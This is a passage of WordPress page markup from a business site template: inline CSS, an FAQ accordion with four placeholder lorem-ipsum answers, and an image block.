.block-62981b50-3c5d-444e-bb72-92934717d974.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-62981b50-3c5d-444e-bb72-92934717d974.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-62981b50-3c5d-444e-bb72-92934717d974.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-62981b50-3c5d-444e-bb72-92934717d974.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-62981b50-3c5d-444e-bb72-92934717d974 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-62981b50-3c5d-444e-bb72-92934717d974.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-62981b50-3c5d-444e-bb72-92934717d974.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-62981b50-3c5d-444e-bb72-92934717d974.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(255, 255, 255, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"2ed0dd46-9fb3-4e5b-a467-914055e0db1a\"} -->\n<style type=\"text/css\"> .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"rightPadding\":80,\"rightPaddingTablet\":30,\"rightPaddingMobile\":0,\"blockId\":\"3cba6fdd-d953-4ef9-8801-a52205e92af1\"} -->\n<style type=\"text/css\"> .block-3cba6fdd-d953-4ef9-8801-a52205e92af1 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-3cba6fdd-d953-4ef9-8801-a52205e92af1 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-3cba6fdd-d953-4ef9-8801-a52205e92af1 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 80px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-3cba6fdd-d953-4ef9-8801-a52205e92af1 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-3cba6fdd-d953-4ef9-8801-a52205e92af1 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-3cba6fdd-d953-4ef9-8801-a52205e92af1\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"ac4f996e-c6b4-4837-bf52-6ec14496e971\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"subheadSpacingTablet\":35,\"subheadSpacingMobile\":25,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n margin-bottom: 35px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n margin-bottom: 25px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-ac4f996e-c6b4-4837-bf52-6ec14496e971\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:500;line-height:1;letter-spacing:0;color:#fe8333\">FAQs</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Get every answer<br>from here</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/accordion {\"block_id\":\"2ca58aed\",\"schema\":\"{\\u0022@context\\u0022:\\u0022https://schema.org\\u0022,\\u0022@type\\u0022:\\u0022AccordionPage\\u0022,\\u0022mainEntity\\u0022:[{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Real Estate Law\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022The industry standard\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Unknown printer galley\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Aldus PageMaker including\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\\u0022}}]}\"} -->\n<div class=\"wp-block-skt-blocks-accordion skt-blocks-accordion__outer-wrap skt-blocks-block-2ca58aed skt-blocks-accordion-icon-row skt-blocks-accordion-layout-accordion skt-blocks-accordion-expand-first-false skt-blocks-accordion-inactive-other-true skt-blocks-accordion-equal-height\"><style type=\"text/css\">.skt-blocks-block-2ca58aed {\nmargin-top: undefinedpx;margin-bottom: undefinedpx;margin-left: undefinedpx;margin-right: undefinedpx;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;margin-right: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;fill: #656565;margin-right: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon svg:hover{\nfill: undefined!important;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon-active svg:hover{\nfill: undefined!important;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-item__outer-wrap{\nmargin-bottom: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion__wrap.skt-blocks-buttons-layout-wrap{\ngrid-column-gap: 10px;grid-row-gap: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-item:hover .skt-blocks-icon svg{\nfill: #656565;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-item .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles{\nflex-direction: row;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-titles-button .skt-blocks-title{\nfont-size: undefinedpx;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-item .skt-blocks-accordion-content{\nbackground-image: linear-gradient(100deg,rgba(238, 238, 238, 100),rgba(238, 238, 238, 1));font-size: undefinedpx;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-item__outer-wrap .skt-blocks-accordion-content {\ndisplay: none;}\n@media only screen and (max-width: 1024px) {\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n}\n@media only screen and (max-width: 768px) {\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n}\n</style><style type=\"text/css\"> .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles {\n color: undefined; background-color: #FFFFFF; }\n .skt-blocks-accordion-item-active .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles {\n color: undefined; background-color: undefined; }\n</style><div class=\"skt-blocks-accordion__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/accordion-item {\"block_id\":\"b558cea3\",\"title\":\"Real Estate Law\",\"content\":\"Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-b558cea3 gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Real Estate Law</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"c6160104\",\"title\":\"The industry standard\",\"content\":\"Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-c6160104 gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">The industry standard</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"886d432c\",\"title\":\"Unknown printer galley\",\"content\":\"Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-886d432c gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Unknown printer galley</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"e4ac92de\",\"title\":\"Aldus PageMaker including\",\"content\":\"Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-e4ac92de gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Aldus PageMaker including</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item --></div></div>\n<!-- /wp:skt-blocks/accordion --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPaddingMobile\":40,\"blockId\":\"8ade65a6-95be-43c3-a862-faf812de3e49\"} -->\n<style type=\"text/css\"> .block-8ade65a6-95be-43c3-a862-faf812de3e49 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-8ade65a6-95be-43c3-a862-faf812de3e49 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-8ade65a6-95be-43c3-a862-faf812de3e49 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-8ade65a6-95be-43c3-a862-faf812de3e49 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-8ade65a6-95be-43c3-a862-faf812de3e49 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-8ade65a6-95be-43c3-a862-faf812de3e49\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":20,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/faq-img.jpg\" alt=\"\" class=\"wp-image-20\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"6c332def-c8d3-4470-b49f-90dc1ba0fb14\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"boxShadowColor\":\"\",\"boxShadowPosition\":\"\",\"className\":\"gb-renovation-section-9\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-9 skt-blocks-block-section-outer-wrap block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth 